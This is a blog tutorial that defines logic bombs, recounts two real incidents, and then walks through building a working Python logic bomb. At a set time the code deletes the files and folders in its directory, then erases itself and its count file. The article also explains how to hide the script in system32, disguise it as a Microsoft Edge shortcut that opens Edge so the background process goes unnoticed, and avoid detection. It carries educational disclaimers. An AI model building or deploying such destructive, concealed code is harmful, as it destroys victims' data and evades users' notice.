Logic Bomb Featured Image by Wallarm
by: Oguz KayraPosted on:

Definition Of Logic Bombs & Examples In Python

In this article, we are going to examine real-world logic bombs. Also, we are going to create one with Python for seeing how to works.

This article is for informational and educational purposes only. My Master Designer is not responsible for any damage that may occur.

What are Logic Bombs?

A malicious piece of code that executes when certain conditions are met is called a logic bomb.

Logic bombs are always running on a condition, for example: on a certain date, such as when the temperature is 75 degrees, in these conditions the code works.

Logic bombs cannot spread to other systems on the network like worms and cannot work unless triggered, they are often written to harm rather than steal information.

Unless logic bombs are activated, they cannot be noticed by the user of the software, some logic bombs may not be understood even after they are triggered.

Logic Bomb Attacks in the Past

There have been many logic bomb attacks in the past, some successful and some unsuccessful. In this section, we will look at 2 major logic bomb attacks.

On July 19, 2019, David Tinley, a contract employee, was found guilty of programming logic bombs in the software he created for Siemens Corporation.

The purpose of the logic bomb was that after a certain period of time the software was deliberately corrupting itself, every time it broke down, David Tinley was charging a repair fee again. It’s spread for 2 years.

On March 20, 2013, in an attack launched against South Korea, a logic bomb hit machines and “wiped the hard drives and master boot records of at least three banks and two media companies at the same time.”

Although logic bombs are simple in operation and structure, the damage they cause and the difficulty of recognizing them make them a great threat.

Logic Bomb vs Time Bomb – What’s the Difference?

A time bomb is used to identify malicious codes activated within a certain date range. This definition can confuse with the logic bomb definition, so let’s explain it.

The logic bomb can have a new timer to shut down damage from the fault if conditions are not met within a given time frame.

The logic bomb may delete itself or activate its payload using the timing system. Time bombs only use timing functions to deactivate (activate) themselves.

Basically, a time bomb can be thought of as a subset of logic bombs.

Creating Logic Bomb in Python

Now, we are ready for creating a new logic bomb in python, this logic bomb is going to trigger when it’s past 12:00.

To observe how this kind of malicious can work, we will program it to delete the files in the directory where the file is located.

# Require Library
import os
import pathlib

The os library is necessary for us to access the terminal, we will use the pathlib library to scan for a specific file extension.

Once our logic bomb runs we will don’t delete the content of the .py files and remove the remaining files from the hard drive.

# Find files and folders
def find():
  dir = os.getcwd()
  files = os.listdir(dir)

  return files

Firstly, we get file names in the current directory for removing. Also we are going to separate the .py file from the remove list because we don’t want remove our main Python file at this moment.

# Remove files and directories
def remove():
  for i in find():
    # If suffix is not .py continue
    if pathlib.Path(i).suffix != ".py":
      # If there is suffix continue 
      # If there is no suffix it means it's a folder
      if pathlib.Path(i).suffix != "":
        os.system('rm "{}"'.format(i))
    
    # if it's not contain delete folder
    if pathlib.Path(i).suffix == "":
      os.system('rmdir "{}"'.format(i))

We currently have 2 functions: file collection and remove. We are going to use these functions later, now we need the timer for set a time to trigger our functions.

from datetime import datetime

# Check Time
def checkDate():
  now = datetime.now()
  current_time = now.strftime("%H:%M:%S")

  target = "00:00:00"
  
  if current_time == target:
    find()
    remove()

When the time is 00:00:00, it will be deleted except for the Python files in the directory where the file is located. You can change your damage technique.

Now we have 2 problems: We need to deactivate the bomb after it is triggered and remove it from the target then we need to run this software in the background.

First, let’s see how to deactivate and delete our bomb after it has done its job properly.

from sys import argv

# remove itself
def deactivate():
  os.remove(argv[0])

You can destroy the Logic Bomb you created with this method, now that we have solved the first problem.

# Check Time
def checkDate():
  now = datetime.now()
  current_time = now.strftime("%H:%M:%S")

  target = "00:00:00"
  
  if current_time == target:
    find()
    remove()
    deactivate()

So we can scan, delete files, and then clean your own bomb from the system. Now let’s see how to run the script in the background.

Hiding Logic Bomb

In this part, we are going to learn how to hide the logic bombs in the system as an application. Let’s make our code a little more sneaky.

  • It’s often useful to put the Logic Bomb in a file that is not very navigated (unknown files of the drive disks or system32).
  • Then create a shortcut of it on the desktop as we will need to trigger this logic bomb.

In this section, we will update our code a little more by addressing these 2 scenarios. First, let’s change some code to make the file look like an application.

# For starting Edge
os.startfile('msedge.exe')

As it is known edge cannot be deleted from windows devices and it will be a great option to hide this bomb, we will present our code as an edge shortcut.

Every time the shortcut we created from the main file path is activated, the logic bomb will be activated first, then the edge window will open.

Of course, in a problem, there are 2 edge file shortcuts that can be found on the desktop, you can add a scan function to the file to prevent this.

Limiting the Number of Services

The most important characteristics of a logic bomb are that it goes undetected until triggered. Our current code has a major flaw, it’s not limit the number of services.

So what does it mean not to limit the number of these services? Every time our code is started, pythonw runs again and creates a new service.

After a while, the number of services may become more than the computer can withstand, and problems such as slowdown, freezing may be noticed.

To fix this, we will create automation that calculates the number of script entries. So instead of opening a service at each login, we will create it once.

Yes, the code here takes our login number and forces the services to run only once. However, if you noticed after the service stopped, the service does not open again due to the number of entries.

Here, a text file named count is created extra, and while the file is self-destructing, it does not destroy that file, so you will not update the deactivate function.

# Close and remove Count file
# Also destruct yourself

def deactivate():
  f.close()
  os.system("del /f /q count.txt")
  os.remove(argv[0])

We have finished the problems and updates that need to be fixed before testing our code, now we can fully test our code.

If you want to test the logic bomb on your system (check everything, if it’s possible use VM), you can find full code on Github. Click here for getting the code.

Testing Logic Bomb

We designed the logic bomb we designed not to cause any damage to the system when it is well isolated. So run it in a folder where there are no important documents.

You can also run it through a Virtual Machine, but your virtual machine must be a Windows device, script commands will only run on Windows Command Prompt.

Logic Bomb - Not Active
Logic Bomb – Not Active

As you can see, there is an edge shortcut on the desktop, this shortcut actually depends on the logic bomb on the C drive.

The script will run when you run the shortcut. The first time it runs, Microsoft Edge will open and the script will start running in the background.

When the edge is closed or any new application is opened and continued to work, the logic bomb will explode unless the service is closed.

Count file will be created on the C drive, that is, in the location where the logic bomb is located, so it will not be noticed. They will be cleaned when the job is done.

Logic-Bomb-Active
Logic-Bomb-Active

When we start the script, we have to see the Microsoft Edge application so that, The probability of detecting the script running in the background is reduced by the user.

When the timer ends, the data in the directory where your script file is will be deleted (put the script in an empty folder to prevent data loss).

Conclusion

Congratulations, you have now learned what a logic bomb is and how it is constructed.

While the logic bombs are not as harmless as in this article (the script can still harm if run by a non-knowledge person), they usually threaten your entire directory data.

You can also explore different aspects of the Logic Bomb by changing its functionality. Good coding, have fun!

Disclaimer: This article is for educational purposes only, My Master Designer is not responsible for any damages that may occur.

Leave a Reply

Your email address will not be published. Required fields are marked *